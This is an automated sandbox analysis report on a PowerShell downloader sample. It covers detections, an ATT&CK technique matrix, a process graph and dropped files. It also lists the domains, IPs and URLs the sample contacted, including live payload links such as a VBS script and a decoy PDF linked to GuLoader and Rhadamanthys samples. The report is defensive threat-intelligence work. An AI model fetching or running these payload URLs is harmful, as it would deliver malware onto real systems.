      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts1
      PowerShell      		1
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture4
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578232 Sample: H2PspQWoHE.ps1 Startdate: 19/12/2024 Architecture: WINDOWS Score: 84 26 x1.i.lencr.org 2->26 28 www.bluemaxxlaser.com 2->28 30 5 other IPs or domains 2->30 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Powershell download and execute 2->42 44 3 other signatures 2->44 9 powershell.exe 16 23 2->9         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 32 www.bluemaxxlaser.com 203.175.174.69, 49749, 80 SGGS-AS-APSGGSSG Singapore 9->32 34 astenterprises.com.pk 107.161.23.150, 443, 49732 RAMNODEUS United States 9->34 46 Powershell creates an autostart link 9->46 15 powershell.exe 23 9->15         started        18 Acrobat.exe 20 73 9->18         started        20 conhost.exe 9->20         started        36 127.0.0.1 unknown unknown 13->36 signatures6 process7 signatures8 48 Loading BitLocker PowerShell Module 15->48 22 AcroCEF.exe 108 18->22         started        process9 process10 24 AcroCEF.exe 22->24         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      H2PspQWoHE.ps134%VirustotalBrowse
      H2PspQWoHE.ps134%ReversingLabsScript-PowerShell.Downloader.Boxter
      H2PspQWoHE.ps1100%AviraTR/PShell.Dldr.VPA

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.astenterprises.com.pk/ms/List0%Avira URL Cloudsafe
      https://www.astznpntznprprisznps.com.pk/ms/List%20of%20rznpquirznpd%20itznpms%20and%20sznprvicznps.p0%Avira URL Cloudsafe
      https://go.microsoft.co$Q0%Avira URL Cloudsafe
      http://crl.moQ0%Avira URL Cloudsafe
      http://www.bluznpmaxxlasznpr.com/ms/ms.vbs0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.214.172
      		truefalse
        		high
        astenterprises.com.pk
        		107.161.23.150
        		truefalse
          		high
          s-part-0035.t-0009.t-msedge.net
          		13.107.246.63
          		truefalse
            		high
            www.bluemaxxlaser.com
            		203.175.174.69
            		truefalse
              		high
              default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
              		84.201.212.68
              		truefalse
                		high
                x1.i.lencr.org
                		unknown
                		unknownfalse
                  		high
                  www.astenterprises.com.pk
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.bluemaxxlaser.com/ms/ms.vbsfalse
                      		high
                      https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdffalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1663713280.000001EED8FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1663713280.000001EED9134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1442104886.000001B095221000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
                            		high
                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.astenterprises.com.pk/ms/Listpowershell.exe, 00000000.00000002.1580972870.000001EECA5B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://go.micropowershell.exe, 00000000.00000002.1580972870.000001EEC9BB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417398167.000001B085AB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417398167.000001B0864C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.microsoft.copowershell.exe, 00000000.00000002.1677670187.000001EEE11C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Licensepowershell.exe, 00000003.00000002.1442104886.000001B095221000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Iconpowershell.exe, 00000003.00000002.1442104886.000001B095221000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.1417398167.000001B0864C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.astznpntznprprisznps.com.pk/ms/List%20of%20rznpquirznpd%20itznpms%20and%20sznprvicznps.ppowershell.exe, 00000000.00000002.1580972870.000001EECA5B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://crl.ver)svchost.exe, 00000009.00000002.2616865544.000001D9E9E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://go.microspowershell.exe, 00000003.00000002.1417398167.000001B085AB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.1580972870.000001EECAA84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.adobe.coReaderMessages.6.drfalse
                                                        		high
                                                        http://astenterprises.com.pkpowershell.exe, 00000000.00000002.1580972870.000001EECAA84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.bluznpmaxxlasznpr.com/ms/ms.vbspowershell.exe, 00000000.00000002.1580972870.000001EEC91B2000.00000004.00000800.00020000.00000000.sdmp, H2PspQWoHE.ps1true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.1580972870.000001EECA5B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1580972870.000001EECAA7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.moQpowershell.exe, 00000003.00000002.1449073605.000001B09D6DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://g.live.com/odclientsettings/Prod-C:qmgr.db.9.drfalse
                                                              		high
                                                              https://go.microsoft.co$Qpowershell.exe, 00000003.00000002.1446516271.000001B09D414000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.1580972870.000001EECAABE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1580972870.000001EECAB1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/powershell.exe, 00000003.00000002.1442104886.000001B095221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000009.00000003.1532335665.000001D9EA000000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1663713280.000001EED8FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1663713280.000001EED9134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1442104886.000001B095221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/pscore68powershell.exe, 00000000.00000002.1580972870.000001EEC8F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417398167.000001B0851B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1580972870.000001EEC8F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417398167.000001B0851B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            203.175.174.69
                                                                            		www.bluemaxxlaser.comSingapore
                                                                            		24482SGGS-AS-APSGGSSGfalse
                                                                            107.161.23.150
                                                                            		astenterprises.com.pkUnited States
                                                                            		3842RAMNODEUSfalse

                                                                            Private

                                                                            IP
                                                                            127.0.0.1

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1578232
                                                                            Start date and time:2024-12-19 12:49:48 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 5m 42s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:18
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:H2PspQWoHE.ps1
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:e3439125d29714a7c9f8f4e8a36c2d0ffc4d5acd926589a4caf255c2b808758a.ps1
                                                                            Detection:MAL
                                                                            Classification:mal84.evad.winPS1@20/61@3/3
                                                                            EGA Information:Failed
                                                                            HCA Information:
                                                                            • Successful, ratio: 83%
                                                                            • Number of executed functions: 5
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .ps1

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 54.224.241.105, 34.237.241.83, 18.213.11.84, 50.16.47.176, 23.218.208.109, 23.195.61.56, 84.201.212.68, 2.19.198.27, 23.32.239.56, 184.30.20.134, 23.32.239.9, 2.19.198.10, 2.19.198.16, 23.32.238.18, 23.32.238.74, 23.32.239.65, 13.107.246.63, 20.12.23.50
                                                                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, azureedge-t-prod.trafficmanager.net, geo2.adobe.com
                                                                            • Execution Graph export aborted for target powershell.exe, PID 344 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 528 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            06:50:45API Interceptor71x Sleep call for process: powershell.exe modified
                                                                            06:51:00API Interceptor2x Sleep call for process: svchost.exe modified
                                                                            06:51:11API Interceptor2x Sleep call for process: AcroCEF.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            203.175.174.69KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                            • www.bluemaxxlaser.com/ms/ms.vbs
                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                            • www.bluemaxxlaser.com/ms/ms.vbs
                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                            • www.bluemaxxlaser.com/ms/ms.vbs
                                                                            R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                            • www.bluemaxxlaser.com/ms/ms.vbs
                                                                            2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                            • www.bluemaxxlaser.com/ms/ms.vbs
                                                                            fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                            • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                            ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                            • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                            FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                            • www.bluemaxxlaser.com/ms/ms.vbs
                                                                            yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                            • www.bluemaxxlaser.com/ms/ms.vbs
                                                                            0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                            • www.bluemaxxlaser.com/ms/ms.vbs
                                                                            107.161.23.150KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                              1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                  R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                    2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                      tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                        FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                          yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                            0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                              List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                bg.microsoft.map.fastly.netKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 199.232.214.172
                                                                                                1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172
                                                                                                StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                                • 199.232.214.172
                                                                                                8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 199.232.214.172
                                                                                                R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172
                                                                                                2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172
                                                                                                LFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                                                                                • 199.232.210.172
                                                                                                FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172
                                                                                                yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.214.172
                                                                                                0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                RAMNODEUSKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                • 107.161.23.150
                                                                                                FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                • 107.161.23.150
                                                                                                SGGS-AS-APSGGSSGKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 203.175.174.69
                                                                                                1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 203.175.174.69
                                                                                                8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 203.175.174.69
                                                                                                R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 203.175.174.69
                                                                                                2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 203.175.174.69
                                                                                                fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 203.175.174.69
                                                                                                ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 203.175.174.69
                                                                                                FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 203.175.174.69
                                                                                                yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 203.175.174.69
                                                                                                0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 203.175.174.69

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0eKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                                • 107.161.23.150
                                                                                                8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150
                                                                                                1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                                • 107.161.23.150
                                                                                                v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                • 107.161.23.150
                                                                                                ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 107.161.23.150

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.49319099587589255
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztan:cJhXC9lHmutpJyiRDeJ/aUKrDgnmR
                                                                                                MD5:B0F300F81B9126BED462244D10EB9940
                                                                                                SHA1:F418533A2B8F557E9ED8C1F0C0D98F17524B0422
                                                                                                SHA-256:E1FBA5DB66B5B2B73583E493D3346D24FD79D162BE0DBECCEF9535A2F4698223
                                                                                                SHA-512:5D1D57CB1005608BF1531CE9164E4D9AB80E2F19D8FDCC05FF4DD60F6967A7FC8B867D3F6BA97099DA1E6012770E1712A3BBFC50E7ABADA212B97AAE101265DD
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1bec65e8, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.7216847931292558
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:zSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:zazaNvFv8V2UW/DLzN/w4wZi
                                                                                                MD5:D26E5E3F40B293D1A2948C32BAAFFF6E
                                                                                                SHA1:4E350BBE2C1546486259B040A9395328FC3F1ED3
                                                                                                SHA-256:E20CF3BBA6BA430434F94575FF6E6862F7D970CC6302492E3106A1C2BD788E7E
                                                                                                SHA-512:601632B97CF267994EEE8DE39F1C63544A7888E032C5C2CB8E10BCA2A8396E4104101D848CFF356880D068DAD7B0B4A45100791EF8543623B4FA840A4E59450D
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:..e.... ...............X\...;...{......................p.D..........{}..3...|Q.h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{...................................L...3...|Q..................eV..3...|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:OpenPGP Public Key
                                                                                                Category:dropped
                                                                                                Size (bytes):16384
                                                                                                Entropy (8bit):0.07976203826833765
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:lllyYeSp23cNqT/fgsCrZClW/tVOW53cXAll+SHY/Xl+/rQLve:ll8z023UqLfgs3GTTcAAS4M
                                                                                                MD5:061F7B7BC32C44D35B25D6848FAC2952
                                                                                                SHA1:34FD025C2313962EED51345C3A53C6D48388E1AD
                                                                                                SHA-256:2CB4C2E579BCD3E613C49253D4F8C540EEC73D2B3F5312503A6A42E15BBF07B0
                                                                                                SHA-512:208E96E67D8221203EEC7DCAD975C4618D71D388350B136FA1AC61807DC2A8994CE183A4335427EB4BC1B8F88D57F98274B9439A6A84F6C03057EA7E5DB94AEF
                                                                                                Malicious:false
                                                                                                Preview:..oU.....................................;...{...3...|.......{}..............{}......{}.vv_Q.....{}..................eV..3...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):290
